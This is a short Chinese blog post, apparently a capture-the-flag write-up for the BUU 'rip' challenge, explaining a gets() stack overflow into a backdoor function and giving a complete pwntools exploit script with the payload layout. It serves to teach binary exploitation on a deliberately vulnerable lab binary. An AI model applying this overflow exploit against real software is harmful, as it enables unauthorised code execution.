[BUU-WriteUp]rip

westfallon

 关注

阅读 57

2022-02-25

rip

使用checksec查看:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-q0zlaOVX-1645757364144)(rip.assets/image-20220225104328732.png)]
保护措施全部关闭。

放进IDA中分析:
在这里插入图片描述

  • gets():存在栈溢出

fun()
在这里插入图片描述

  • 存在后门函数

步骤解析

完整exp

from pwn import *

p = process("../buu/rip")
# p = remote("node4.buuoj.cn",27965)

elf = ELF("../buu/rip")
fun_addr = elf.symbols['fun']
payload = b'M' * (0xF + 8) + p64(fun_addr-1) +p64(fun_addr)
p.sendline(payload)

p.interactive()

相关推荐

第二周buu

pipu 74 0 0

buu-SimpleRev

陆佃 60 0 0

buu-day08

江南北 75 0 0

BUU [HCTF 2018]Hideandseek

witmy 53 0 0

buu-re-CrackRTF

勇敢乌龟 71 0 0

RIP

左小米z 118 0 0

rip实验

五殳师兄 68 0 0

rip习题

萨科潘 41 0 0

HTB:Precious[WriteUP]

言诗把酒 26 0 0

buu-reverse3

窗外路过了谁 54 0 0

精彩评论(0)

0 0 举报